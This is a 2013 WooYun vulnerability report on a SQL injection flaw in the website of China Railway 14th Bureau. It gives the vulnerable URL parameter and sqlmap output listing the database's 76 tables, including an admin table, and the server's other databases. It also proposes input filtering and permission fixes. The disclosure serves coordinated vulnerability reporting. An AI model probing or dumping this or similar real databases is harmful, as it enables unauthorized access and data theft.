当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-038835

漏洞标题:中铁14局sql注入漏洞可脱库

相关厂商:中铁14局

漏洞作者: moble

提交时间:2013-10-04 07:09

修复时间:2013-11-18 07:10

公开时间:2013-11-18 07:10

漏洞类型:网络敏感信息泄漏

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-04: 细节已通知厂商并且等待厂商处理中
2013-10-09: 厂商已经确认,细节仅向厂商公开
2013-10-19: 细节向核心白帽子及相关领域专家公开
2013-10-29: 细节向普通白帽子公开
2013-11-08: 细节向实习白帽子公开
2013-11-18: 细节向公众公开

简要描述:

中铁14局sql注入可脱库

详细说明:

注入点

http://www.crssg.com/qyglshow.php?list=834


漏洞证明:

[12:34:07] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: PHP 4.1.2, Apache 2.2.4
back-end DBMS: Microsoft SQL Server 2000
[12:34:07] [INFO] fetching current database
current database: 'ssjs'
[12:34:07] [INFO] fetched data logged to text files under 'E:\Python27\sqlmap\o
tput\www.crssg.com'


数据表
Database: ssjs
[76 tables]
+-------------------------+
| T_actions |
| T_advice |
| T_announce |
| T_down |
| T_gg |
| T_hero |
| T_hp_abme |
| T_hp_abme |
| T_hp_article |
| T_hp_gb |
| T_hp_photo |
| T_jianj |
| T_lanmu |
| T_linkpic |
| T_location |
| T_movie |
| T_news_about |
| T_news_about |
| T_news_link |
| T_news_topic |
| T_picintro |
| T_picnews |
| T_reportinfo |
| T_rlzy_mszj |
| T_rlzy_qyml |
| T_rlzy_rcxq |
| T_sys_announce |
| T_sys_bm |
| T_sys_link_type |
| T_sys_link_type |
| T_sys_option |
| T_sys_powers |
| T_sys_qz |
| T_sys_ry |
| T_sys_weather |
| T_sys_zw |
| T_word_head |
| T_word_head |
| T_word_seal |
| T_workdiary |
| T_zt_zj |
| T_zt_zj |
| V_sys_ry |
| ?? |
| admin |
| counter |
| diaocha |
| dtproperties |
| fslj_table |
| gbook |
| inidata |
| pangolin_test_table |
| pbcatcol |
| pbcatedt |
| pbcatfmt |
| pbcattbl |
| pbcatvld |
| picshow |
| sbgf |
| sbjg |
| sblx |
| sbxh |
| sbxy |
| select1 |
| select2 |
| sysconstraints |
| syssegments |
| wbsb |
| wbzl |
| wzgf |
| wzjg |
| wzlx |
| wzxh |
| wzxy |
| xysb |
| web.pangolin_test_table |
+-------------------------+
由于用户权限设置问题 还可以脱出别的数据库
available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] ssjs
[*] tempdb
可以获取数据库密码 再次就不粘贴出来了

修复方案:

过滤 数据库用户权限设置

版权声明:转载请注明来源 moble@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-10-09 14:19

厂商回复:

最新状态:

暂无


漏洞评价:

评论